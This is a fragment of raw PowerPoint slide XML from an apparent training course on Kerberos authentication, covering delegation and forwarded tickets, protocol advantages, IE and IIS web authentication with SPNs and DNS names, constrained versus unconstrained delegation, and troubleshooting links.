            <a:ext cx="2500581" cy="1198527"/>
            <a:chOff x="3111530" y="2093643"/>
            <a:chExt cx="2500581" cy="1198527"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151" name="Rectangle 150"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3111530" y="2093643"/>
              <a:ext cx="2500581" cy="119852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spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="152" name="TextBox 151"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3692408" y="2283580"/>
              <a:ext cx="1671680" cy="713016"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="2200"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Forwarded TGT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="2200"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Authenticator</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="153" name="Picture 1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3621" y="2213991"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="154" name="Right Arrow 153"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3530747" y="2283580"/>
              <a:ext cx="143276" cy="170966"/>
            </a:xfrm>
            <a:prstGeom prst="right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de-DE" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="156" name="Picture 15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214083" y="2568665"/>
              <a:ext cx="356910" cy="583336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="TextBox 156"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355909" y="4600144"/>
            <a:ext cx="8205053" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The KDC can decrypt the forwarded TGT and finds the cyan key in there. With that key it can decrypt the authenticator and finally issue a TGS for the requested service. The delegated service can access the requested service as the user could having the TGS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213130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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16"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5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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kerberos Protocol Advantages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="5078313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Faster connection authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mutual authentication of both client and  server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User must have TGT /  Service must have a registered SPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client authenticates to service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service authenticates to client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation of authentication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Transitive trust between domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securely deliver user credentials in a “ticket”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Attribute Certificate (PAC)  :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field in ticket </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privacy through encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos authenticator prevents packet replay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support for smartcard logon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IETF standard for interoperability (Mainframe, UNIX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extensible (Credentials 2000, S4U Extensions, Claims 2012)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kerberos Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400555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Lab 7.1 + 7.2: Accessing web pages using Kerberos Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Kerberos for web authentication</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388314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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lab 7.3: Accessing web pages using Kerberos Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1615827"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By default the internet explorer does </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not authenticate to web sites that are </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not in the local intranet zone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That is the reason why there are no </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos frames in the network trace</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Kerberos for web authentication</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3288679544"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="389436" y="3645024"/>
          <a:ext cx="4165600" cy="1308100"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Image" r:id="rId4" imgW="4164840" imgH="1307880" progId="Photoshop.Image.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId4" imgW="4164840" imgH="1307880" progId="Photoshop.Image.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="7" name="Object 6"/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="389436" y="3645024"/>
                        <a:ext cx="4165600" cy="13081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193678912"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4810805" y="1146572"/>
          <a:ext cx="3962400" cy="5686425"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Image" r:id="rId6" imgW="5282280" imgH="7580880" progId="Photoshop.Image.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId6" imgW="5282280" imgH="7580880" progId="Photoshop.Image.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="8" name="Object 7"/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId7"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="4810805" y="1146572"/>
                        <a:ext cx="3962400" cy="5686425"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3777955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IIS Binding and DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CNames</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="2200602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you have a created web site binding you are also required to create a DNS record to enable clients accessing the web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two options available in DNS: A record or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CName</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the Internet Explorer will actually not ask for the SPN (http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) but for the related host (http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MachineName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you use an additional A record, the internet explorer uses the new name to construct the Kerberos request (http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NewARecord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important: Using Kerberos for web authentication</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406418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IIS Binding and DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CNames</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1615827"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Troubleshooting Kerberos Delegation White paper: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/download/en/details.aspx?id=4754</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DelegConfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://blogs.msdn.com/b/emilianb/archive/2009/04/16/using-delegconfig-tool-for-troubleshooting-kerberos-delegation-issues.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kerberos Delegation Troubleshooting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160454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Lab 7.4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Uncontrained</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Delegation Network Traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Kerberos for web authentication</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71692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dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constraint Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336770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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does constrained mean?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-constrained delegation gives too much control to the trusted server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Neither the client nor the administrator knows what the server is doing with the TGTs it received</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legacy mode of delegation is still supported only if the user has initially entered a user credential to obtain a TGT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restricts the delegation of credentials only to specified services that have to be defined in AD first.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311788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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does constrained mean?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
